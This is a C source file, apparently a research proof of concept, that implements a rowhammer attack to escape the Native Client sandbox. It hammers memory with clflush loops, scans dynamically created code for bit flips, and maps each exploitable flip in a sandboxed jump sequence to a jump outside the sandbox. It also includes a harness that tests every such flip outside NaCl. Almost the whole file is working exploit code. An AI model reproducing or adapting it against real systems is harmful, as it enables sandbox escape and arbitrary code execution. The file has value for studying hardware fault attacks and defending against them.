
#include <assert.h>
#include <setjmp.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>


extern char template_start[];
extern char template_end[];

void *code_addr;
uint64_t mem_base = (uint64_t) 0x123 << 32;
uint64_t jmp_dest;
uint64_t evil_jmp_dest;
uint64_t rax;
uint64_t add_val;
uint32_t flags;
jmp_buf g_jmp_buf;

uint64_t stack_ptr;

void dest_asm();
__asm__(".pushsection .text, \"ax\", @progbits\n"
        ".global dest_asm\n"
        "dest_asm:\n"
#if defined(__native_client__)
        "naclrestsp stack_ptr(%rip), %r15\n"
#else
        "movq stack_ptr(%rip), %rsp\n"
#endif
        "jmp dest_func\n"
        ".popsection\n");

void dest_func() {
  printf("here\n");
  longjmp(g_jmp_buf, 1);
}

#define kCFlag (1 << 0)
#define kPFlag (1 << 2)
#define kZFlag (1 << 6)
#define kSFlag (1 << 7)

struct Jump {
  /* Where the jump is located. */
  int bundle;  /* Bundle number */
  int offset_in_bundle;  /* Offset in bytes */
  /* How to reach the jump, from a bundle start: */
  int jump_bundle;  /* Bundle to jump to */
  int flags;  /* Flags to set when jumping */
};

/* Table describing how we can get to indirect jumps within our template. */
const struct Jump jumps[] = {
  { 0, 2*4 + 8*0,  0, 0 },
  { 0, 2*4 + 8*1,  0, 1 },
  { 0, 2*4 + 8*2,  0, 2 },

  { 1, 2*3 + 8*0,  1, 0 },
  { 1, 2*3 + 8*1,  0, 3 },
  { 1, 2*3 + 8*2,  0, 4 },

  { 2, 8*0,  2, 0 },
  { 2, 8*1,  1, 1 },
  { 2, 8*2,  1, 2 },
  { 2, 8*3,  1, 3 },
};

/* Given that we have detected a change to |bit| in |byte|, this
   function determines whether this bit flip is exploitable.  If it is
   exploitable, this sets up state for exploiting that bit flip and
   returns true.  Otherwise, it returns false. */
int try_exploit(int byte, int bit) {
  int i;
  for (i = 0; i < sizeof(jumps) / sizeof(jumps[0]); i++) {
    const struct Jump *jump = &jumps[i];
    int start = jump->bundle * 32 + jump->offset_in_bundle;
    int jmp_seq_size = 8;
    if (byte >= start && byte < start + jmp_seq_size) {
      byte -= start;
      flags = jump->flags;
      jmp_dest = (uintptr_t) code_addr + jump->jump_bundle * 32;
      goto found;
    }
  }
  return 0;
 found:

  if (byte == 1 && bit < 3) {
    /* Dest reg in "and" changed. */
    rax = evil_jmp_dest - mem_base;
    return 1;
  }

  if ((byte == 3 && bit == 2) ||
      (byte == 5 && (bit >= 3 && bit < 6))) {
    /* %r15 in "add" changed. */
    rax = 0;
    add_val = evil_jmp_dest;
    return 1;
  }

  if (byte == 7 && bit < 3) {
    /* Dest reg in "jmp" changed. */
    rax = 0;
    add_val = evil_jmp_dest;
    return 1;
  }

  return 0;
}

/* Temporary variables used for setting flags. */
int flagval1;
int flagval2;

/* SAHF isn't allowed under NaCl (due to a bug), so we have to use a
   more convoluted means for setting flags. */
void set_flags_part1() {
  flagval1 = 0;
  flagval2 = 0;
  switch (flags) {
  case 1:
    /* Set Z (zero) */
    break;
  case 2:
    flagval1 = -1; /* Set S (signed) */
    break;
  case 3:
    flagval1 = 3; /* Set P (parity) */
    break;
  case 4:
    /* Set C (carry) */
    flagval1 = -1;
    flagval2 = 0x11;
    break;
  default:
    flagval1 = 1;
    break;
  }
}

#define SET_FLAGS \
    "movl flagval1(%rip), %eax\n" \
    "addl flagval2(%rip), %eax\n" /* Sets arithmetic flags */

/* Template code for setting flags. */
extern char set_flags_template[];
extern char set_flags_template_end[];
__asm__(".pushsection .text, \"ax\", @progbits\n"
        ".p2align 5\n"
        "set_flags_template:\n"
        "movl flagval1(%r15), %ebx\n"                           \
        "addl flagval2(%r15), %ebx\n" /* Sets arithmetic flags */
        "set_flags_template_end:\n"
        ".popsection\n");

void test_flag_setting() {
  int i;
  for (i = 0; i < 5; i++) {
    flags = i;
    set_flags_part1();
    __asm__ volatile(SET_FLAGS
                     "push %rax\n"
                     "lahf\n"
                     "mov %ah, flags(%rip)\n"
                     "pop %rax\n");
    int j;
    if (flags & kZFlag) { j = 1; }
    else if (flags & kSFlag) { j = 2; }
    else if (flags & kPFlag) { j = 3; }
    else if (flags & kCFlag) { j = 4; }
    else { j = 0; }
    assert(i == j);
  }
}

void do_jump() {
  printf("dest_asm=%p\n", dest_asm);
  printf("evil_jmp_dest=0x%llx\n", (long long) evil_jmp_dest);
  printf("mem_base=0x%llx\n", (long long) mem_base);
  printf("rax=0x%llx\n", (long long) rax);

  set_flags_part1();

  __asm__ volatile(
#if !defined(__native_client__)
                   "movq mem_base(%rip), %r15\n"
                   SET_FLAGS
#endif
                   "movq rax(%rip), %rax\n"
                   /* Save rsp in case the "and" morphed to clobber it. */
                   "movq %rsp, stack_ptr(%rip)\n"
                   /* For cases where add is changed: */
                   "movq add_val(%rip), %r14\n"
                   "movq add_val(%rip), %r13\n"
                   "movq add_val(%rip), %r11\n"
                   "movq add_val(%rip), %rdi\n"
                   /* For cases where jmp is changed: */
                   "movq add_val(%rip), %rcx\n"
                   "movq add_val(%rip), %rdx\n"
#if defined(__native_client__)
                   "naclrestsp add_val(%rip), %r15\n"
#else
                   "movq add_val(%rip), %rsp\n"
#endif
                   /* Jump using %rbx as a scratch register. */
                   "mov jmp_dest(%rip), %rbx\n"
#if defined(__native_client__)
                   "nacljmp %ebx, %r15\n"
#else
                   "jmpq *%rbx\n"
#endif
                   );
}

#if defined(__native_client__)

#include "nacl_dyncode.h"

extern char _etext[];
void func_entry();

char *dyncode_start;
char *dyncode_end;
char *next_alloc;
int size;

const int toggles = 540000;

/* Pick a random page-aligned address within the dynamic code area. */
char *pick_addr() {
  size_t offset = (size_t) (rand() << 12) % (dyncode_end - dyncode_start);
  return dyncode_start + offset;
}

/* Do rowhammering. */
static void toggle(int iterations, int addr_count) {
  addr_count = 2;
  int j;
  for (j = 0; j < iterations; j++) {
    volatile uint32_t *addrs[addr_count];
    int a;
    for (a = 0; a < addr_count; a++)
      addrs[a] = (uint32_t *) pick_addr();

    int i;
    for (i = 0; i < toggles; i++) {
      int a;
      for (a = 0; a < addr_count; a++)
        *addrs[a];
      for (a = 0; a < addr_count; a++)
        asm volatile("clflush %0" : : "m" (*(int **) addrs[a]) : "memory");
    }
  }
}

void search_for_bit_flips() {
  char *dest;
  for (dest = dyncode_start; dest + size <= dyncode_end; dest += size) {
    if (memcmp(dest, template_start, size) != 0) {
      printf("change found at %p\n", dest);

      int byte;
      for (byte = 0; byte < size; byte++) {
        int bit;
        for (bit = 0; bit < 8; bit++) {
          int mask = 1 << bit;
          if ((dest[byte] & mask) != (template_start[byte] & mask)) {
            printf("change at byte %i, bit %i\n", byte, bit);
            code_addr = dest;
            if (!try_exploit(byte, bit)) {
              printf("no exploit known for this bit\n");
            } else {
              printf("exploiting...\n");

              /* Set up a code sequence that set flags and then does a
                 direct jump.  This is necessary because nacljmp
                 clobbers flags. */
              char buf[32];
              memset(buf, 0x90, sizeof(buf)); /* NOP fill */
              memcpy(buf, set_flags_template,
                     set_flags_template_end - set_flags_template);
              char *ptr = buf + (set_flags_template_end - set_flags_template);
              /* Write 32-bit jmp */
              *ptr++ = 0xe9;
              *(uint32_t *) ptr =
                  jmp_dest - ((uintptr_t) next_alloc + (ptr + 4 - buf));
              int rc = nacl_dyncode_create(next_alloc, buf, sizeof(buf));
              assert(rc == 0);
              jmp_dest = (uintptr_t) next_alloc;
              next_alloc += sizeof(buf);

              if (!setjmp(g_jmp_buf)) {
                do_jump();
              }
              exit(0);
            }
          }
        }
      }
    }
  }
}

int main() {
  size = template_end - template_start;
  printf("size=%i\n", size);
  printf("_etext=%p\n", _etext);
  dyncode_start = (char *) (((uintptr_t) _etext + 0xffff) & ~0xffff);
  dyncode_end = (char *) 0x10000000;
  next_alloc = dyncode_start;
  dyncode_start += 0x10000;
  printf("dyncode size=%i\n", dyncode_end - dyncode_start);

  /* Populate dyncode area. */
  char *dest;
  for (dest = dyncode_start; dest + size <= dyncode_end; dest += size) {
    int rc = nacl_dyncode_create(dest, template_start, size);
    assert(rc == 0);
  }

  __asm__ volatile("movq %r15, mem_base(%rip)");
  evil_jmp_dest = mem_base + (uintptr_t) func_entry;

  int iter = 0;
  for (;;) {
    search_for_bit_flips();

    printf("toggle %i\n", iter++);
    /* toggle(10, 8); */
    toggle(10, 2);
  }

  return 0;
}

#else

/* This gets used if we are running outside of NaCl.  This tests that
   we can correctly handle each possible bit flip in our template
   code. */
int main() {
  test_flag_setting();

  setvbuf(stdout, NULL, _IONBF, 0);

  code_addr = mmap(0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC,
                   MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
  assert(code_addr != MAP_FAILED);

  int size = template_end - template_start;
  printf("size=%i\n", size);

  evil_jmp_dest = (uintptr_t) dest_asm;

  int matches = 0;

  int byte;
  for (byte = 0; byte < size; byte++) {
    int bit;
    for (bit = 0; bit < 8; bit++) {
      if (try_exploit(byte, bit)) {
        memcpy(code_addr, template_start, size);
        ((uint8_t *) code_addr)[byte] ^= 1 << bit;
        printf("mod byte %i, bit %i\n", byte, bit);

        /* Dump the modified code for disassembly so that we can see
           what the bit flip converted it into. */
        FILE *fp = fopen("tmp_data", "w");
        assert(fp != NULL);
        fwrite(code_addr, 32, 1, fp);
        fclose(fp);
        /* int rc = system("objdump -D -b binary -m i386:x86-64 tmp_data"); */
        /* assert(rc == 0); */

        if (!setjmp(g_jmp_buf)) {
          do_jump();
        }
        matches++;
      }
    }
  }

  printf("matches=%i\n", matches);
  assert(matches == 100);

  return 0;
}

#endif
